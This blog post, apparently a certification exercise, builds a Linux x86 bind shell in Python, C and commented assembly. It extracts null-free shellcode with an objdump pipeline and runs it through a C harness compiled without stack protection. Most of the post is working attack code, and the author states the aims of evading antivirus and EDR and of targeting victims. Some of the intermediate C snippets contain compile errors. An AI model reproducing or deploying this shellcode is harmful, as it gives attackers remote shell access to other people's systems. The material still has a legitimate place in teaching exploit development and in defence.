<\/p>\n\n\n\n
![\"\"](\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200820_175811.jpg\")
<\/figure>\n\n\n\nFor a better understanding of the concept, we will start with programming a bind shell in a higher level language before diving straight into ASM to get a clear understanding of the program flow and the required syscalls<\/a> which we will later convert into x86 Assembly. <\/p>\n\n\n\n One must be wondering why convert things into ASSEMBLY LANGUAGE in the first place?! There are multiple reasons to it which can’t be described in a single post. My personal favourite being – to evade malware from Antiviruses, EDRs etc. Here are two blogs each from SentinelOne<\/a> and Fireeye<\/a> which explain why attackers write shellcodes. Here’s a Python equivalent of a Bind shell:<\/p>\n\n\n\n Now let’s take the above as a reference and try to get a little closer to our end goal. We will attempt to convert the same in C and later into x86 Assembly language. The socket function is a part of sys\/socket.h library and as seen above, it takes three arguments – int domain, int type and int protocol<\/em>. Also, another thing worth noticing is that the socket function itself is of type int<\/em>. “Upon successful completion, socket() shall return a non-negative integer, the socket file descriptor. Otherwise, a value of -1 shall be returned and errno set to indicate the error.”<\/em><\/p><\/blockquote>\n\n\n\n Now that we have our socket function ready, let’s try to define it.<\/p>\n\n\n\n Next, we define our bind()<\/a> function.<\/p>\n\n\n\n The bind function takes our socket as a parameter and essentially binds it to certain values assigned in the structure sockaddr<\/a>. The sockaddr structure is a base structure for all syscalls and functions that deal with internet addresses which looks like this:<\/p>\n\n\n\n Moving ahead, we define our sockaddr structure and pass the same in the bind function in our C code snippet:<\/p>\n\n\n\n Now let’s define our listen()<\/a> function:<\/p>\n\n\n\n The backlog parameter simply defines the queue length to which the socket’s pending connections would grow. Adding the same to our exisitng C code snippet, we get:<\/p>\n\n\n\n Now that we have our bind function ready with our IP address and port defined in it, let’s define the accept()<\/a> function which will accept incoming connection to our defined IP address and port – which in our case is Localhost and port 4444 . The function simply accepts three arguments – our defined socket<\/em>, address to sockaddr struct<\/em> and the size of sockaddr<\/em> which would store the peer’s information. We can set the same to null as we really don’t require peer’s info and also because it will be quite easier to convert the same into shellcode. Adding accept function to our C code snippet, we get:<\/p>\n\n\n\n Now for the last part, all that is left is redirecting<\/a> STDIN, STDOUT and STDERR to our socket and calling our shell via execve()<\/a>. Let’s add the same in our code snippet and run the shell.<\/p>\n\n\n\n Now that our shell is ready, let’s quickly compile it and execute it on our local system. <\/p>\n\n\n\n And here we have our compiled bind shell running in window 1, a netcat client connecting to the shell on port 4444 in window 2 and current netstat output while the shell runs in window 3.<\/p>\n\n\n\n Below is the ASM equivalent with commented description of the same bind shell.<\/p>\n\n\n\n Now let’s compile and link our shell with nasm<\/em> and ld<\/em> and run it.<\/p>\n\n\n\n And we have a bind shell running on port 4444!<\/p>\n\n\n\n Let’s quickly generate our shellcode out of the compiled file and attempt to execute it via a C harness which we can then use to target victims. Before we move ahead, let’s check if our shellcode has any null characters in it. We can do so by using objdump as shown below:<\/p>\n\n\n\n So far so good! Now using a nice commandline-fu<\/a> to generate shellcode:<\/p>\n\n\n\n We will feed the generated shellcode from the above cli-fu in our C harness.<\/p>\n\n\n\n And lastly compiling it with the following flags as done earlier:<\/p>\n\n\n\n And we have our bind shell ready to be shipped! \ud83d\ude00<\/p>\n\n\n\n That’s all for this post folks! This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Student ID: PA-14690<\/p>\n\n\n\n
In this blog post, I will explain a bind shell starting off with with Python and gradually build the same on lower levels. You can choose the language of your preference to begin with or might even straightaway go into ASM code. Ultimately, it all boils down to your level of comfort and understading.<\/p>\n\n\n\n
\n\n\n\nimport socket\n\nbind_ip = \"0.0.0.0\" #Define the IP to bind to\nbind_port = 4444 #Define port to bind to\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defining socket function \n\nserver.bind((bind_ip, bind_port)) #Defining bind function to bind to our given IP and ports\n\nserver.listen(5)\n\n#Client handling (Can be ignored)\ndef handler(client_socket):\n request = client_socket.recv(1024)\n print(\"[*] Received: %s\" % request)\n client_socket.send(b\"ACK!\")\n client_socket.close()\n\nwhile True:\n client, addr = server.accept()\n handler()\n \n <\/code><\/pre>\n\n\n\n
\n\n\n\n
Like any other programming language, we first initialize a socket to enable communication between two nodes. In C, we do it with the socket()<\/a> function.<\/p>\n\n\n\n#include <sys\/socket.h>\nint socket(int domain, int type, int protocol);<\/code><\/pre>\n\n\n\n
Let’s try to understand the arguments.<\/p>\n\n\n\n#include<sys\/socket.h>\nint main()\n{\n\t\/\/int socket_d = socket(domain, type, protocol)\n\tint socket_d = socket(AF_INET, SOCK_STREAM, 6)\n...\n...\n return 0;\n}<\/code><\/pre>\n\n\n\n #include <sys\/types.h> \n #include <sys\/socket.h>\n\n int bind(int socket_d, const struct sockaddr *addr, socklen_t addrlen);<\/code><\/pre>\n\n\n\n#include <netinet\/in.h>\n\nstruct sockaddr_in {\n short sin_family; \/\/ e.g. AF_INET\n unsigned short sin_port; \/\/ e.g. htons(3490)\n struct in_addr sin_addr; \/\/ see struct in_addr, below\n char sin_zero[8]; \/\/ zero this if you want to\n};\n\nstruct in_addr {\n unsigned long s_addr; \/\/ load with inet_aton()\n};<\/code><\/pre>\n\n\n\n#include<sys\/socket.h>\n#include <sys\/types.h>\n#include <netinet\/in.h> \n\nint main()\n{\n\t\/\/int socket_d = socket(domain, type, protocol)\n\tint socket_d = socket(AF_INET, SOCK_STREAM, 6)\n\n\tstruct sockaddr sockstruct;\n\tsockstruct.sin_family = AF_INET;\n\tsockstruct.sin_port = htons(4444);\n\tsockstruct.sin_addr.s_addr = htonl(INADDR_ANY);\n\n\n\tint bind(socket_d, (struct sockaddr*) &sockstruct, \n sizeof(sockstruct));\n\n return 0;\n}<\/code><\/pre>\n\n\n\n#include <sys\/types.h> \/* See NOTES *\/\n#include <sys\/socket.h>\n\nint listen(int sockfd, int backlog);<\/code><\/pre>\n\n\n\n#include<sys\/socket.h>\n#include <sys\/types.h>\n#include <netinet\/in.h> \n\nint main()\n{\n\t\/\/int socket_d = socket(domain, type, protocol)\n\tint socket_d = socket(AF_INET, SOCK_STREAM, 6)\n\n\tstruct sockaddr sockstruct;\n\tsockstruct.sin_family = AF_INET;\n\tsockstruct.sin_port = htons(4444);\n\tsockstruct.sin_addr.s_addr = htonl(INADDR_ANY);\n\n\n\tint bind(socket_d, (struct sockaddr*) &sockstruct, sizeof(sockstruct));\n\n\tlisten(socket_d, 2);\n\n return 0;\n}<\/code><\/pre>\n\n\n\n#include<sys\/socket.h>\n#include <sys\/types.h>\n#include <netinet\/in.h>\n\nint socket_d;\nint socket_d_peer; \n\nint main()\n{\n\t\/\/int socket_d = socket(domain, type, protocol)\n\tint socket_d = socket(AF_INET, SOCK_STREAM, 6)\n\n\tstruct sockaddr sockstruct;\n\tsockstruct.sin_family = AF_INET;\n\tsockstruct.sin_port = htons(1337);\n\tsockstruct.sin_addr.s_addr = htonl(INADDR_ANY);\n\n\n\tint bind(socket_d, (struct sockaddr*) &sockstruct, sizeof(sockstruct));\n\n\tlisten(socket_d, 2);\n\n\tsocket_d_peer = accept(socket_d, NULL, NULL);\n\n return 0;\n}<\/code><\/pre>\n\n\n\n#include <stdio.h>\n#include<sys\/socket.h>\n#include <sys\/types.h>\n#include <netinet\/in.h>\n#include<unistd.h>\n\n\nint socket_d;\nint socket_d_peer; \nstruct sockaddr sockstruct;\n\nint main()\n{\n\t\/\/int socket_d = socket(domain, type, protocol)\n\tint socket_d = socket(AF_INET, SOCK_STREAM, 6);\n\n\t\n\tsockstruct.sin_family = AF_INET;\n\tsockstruct.sin_port = htons(1337);\n\tsockstruct.sin_addr.s_addr = htonl(INADDR_ANY);\n\n\n\tbind(socket_d, (struct sockaddr*) &sockstruct, sizeof(sockstruct));\n\n\tlisten(socket_d, 2);\n\t\/\/printf(\"Listening\\n\");\n\n\tsocket_d_peer = accept(socket_d, NULL, NULL);\n\n\tdup2(socket_d_peer, 0); \/\/STDIN\n\tdup2(socket_d_peer, 1); \/\/STDOUT\n\tdup2(socket_d_peer, 2); \/\/STDERR\n\n\texecve(\"\/bin\/sh\", NULL, NULL);\n\tclose(socket_d);\n\n return 0;\n}<\/code><\/pre>\n\n\n\nCompiling our C source file using gcc with the following flags:\n$ gcc -z execstack -fno-stack-protector -o bind bind.c<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/C_bindshell-2-1024x463.jpg\")
<\/figure>\n\n\n\n; Syscalls - cat \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h\n\n\nglobal _start\n\nsection .text\n_start:\n\nsock:\n\t; creating a socketcall syscall\n\t; int socketcall(int call, unsigned long *args);\n\t; Call numbers for socketcall -- \/usr\/include\/linux\/net.h\n\n\t; Clearing out registers\n\txor eax, eax\n\txor ebx, ebx\n\txor ecx, ecx\n\n\n\t; loading args to SYS_socket call\n\t; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)\n\n\tpush ecx ; IPPROTO_IP\n\tpush 0x1 ; SOCK_STREAM\n\tpush 0x2 ; AF_INET\n\tmov ecx, esp ; ECX pointing to arguments for socket call\n\n\tmov bl, 0x1 ; 1 for SYS_socket \n\tmov al, 0x66 ; Invoking SYS_socketcall\n\tint 0x80\n\n\tmov esi, eax ; Saving socket for further use\n\n\t; creating a bind function\n\n\t; bind(socket_d, (struct sockaddr*) &sockstruct, sizeof(sockstruct))\n\n\t\n\n\t; creating a sockaddr structure\n\t; srv_addr.sin_family = AF_INET;\n\t; srv_addr.sin_port = htons( 7777 );\n\t; srv_addr.sin_addr.s_addr = htonl (INADDR_ANY);\n\t\n\txor ebx, ebx\n\t\n\tpush ebx ; Pushing 0x0 to listen on all interfaces\n\tpush word 0x5c11 ; Pushing 4444 as port\n\tpush word 0x2 ; Pushing 0x2 defining AF_INET\n\n\tmov ecx, esp ; ECX pointing to sockaddr structure\n\n\t; creating bind function\n\t; bind( socket_fd, (struct sockaddr *)&srv_addr, sizeof(srv_addr) );\n\n\tpush 0x10 ; Size of sockstruct\n\tpush ecx ; Sockstruct from stack\n\tpush esi ; Earlier saved socket\n\n\tmov ecx, esp ; ECX pointing to arguments to bind function for SYS_socketcall\n\n\tmov bl, 0x2 ; 2 for SYS_bind\n\tmov al, 0x66 ; Invoking SYS_socketcall\n\tint 0x80\n\n\t; Listen to incoming connections\n\t; listen(socket_fd, 0);\n\t\n\t; arguments to listen function\n\n\txor ebx, ebx\n\tpush ebx ; Pushing 0\n\tpush esi ; Pushing sock_fs as stored in ESI earlier\n\n\tmov ecx, esp ; ECX pointing to arguments for listen function\n\tmov al, 0x66 ; Invoking SYS_socketcall\n\tmov bl, 0x4 ; 4 for SYS_listen\n\tint 0x80\n\n\t; accepting incoming connections\n\t; accept(socket_fd, (struct sockaddr *)&cli_addr, &socklen );\n\n\t; arguments to accept function (Refer C code snippet)\n\n\n\n\txor ebx, ebx\n\tpush ebx ; \n\tpush ebx ; \n\tpush esi ; Pushing ESI which is pointing to sockfd\n\n\tmov ecx, esp\n\n\tmov al, 0x66 ; Invoking SYS_socketcall\n\tmov bl, 0x5 ; 5 for SYS_accept\n\tint 0x80\n\n\t; piping output to our socket\n\t; dup2(client_fd, 0); INPUT\n\t; dup2(client_fd, 1); OUTPUT\n\t; dup2(client_fd, 2); ERROR\n\n\tmov ebx, eax\n\txor ecx, ecx\n\tmov cl, 0x2\n\npipe:\n\n\tmov al, 0x3f ; dup2 syscall\n\tint 0x80\n\tdec ecx\n\tjns pipe\n\n\t; execve syscall to execute \n\n\txor ecx, ecx\n\tmov edx, ecx\n\n\tpush ecx\n\tpush 0x68732f2f ; pushing \/\/sh\n\tpush 0x6e69622f\t; pushing \/bin\n\tmov ebx, esp\n\n\tmov al, 0xb ; Invoking execve syscall\n\t\n\tint 0x80<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/bind_shell_asm-1024x284.jpg\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/objdump-1024x825.jpg\")
<\/figure>\n\n\n\nobjdump -d .\/bind_shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/\"\/'|sed 's\/$\/\"\/g'<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/c-harness.jpg\")
<\/figure>\n\n\n\ngcc -z execstack -fno-stack-protector shellcode.c -o bind_shell_linux_x86<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/last-1024x331.jpg\")
<\/figure>\n\n\n\n
The major drawback with bind shells is that in most of the real life scenarios, ingress connections from random IPs are mostly blocked and if not blocked then heavily monitored. In such a scenario, we fallback to reverse shells. A reverse shell connects back to the attacker’s machine instead of having the attacker to connect to the victim’s machine.<\/p>\n\n\n\n
\n\n\n\n
http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n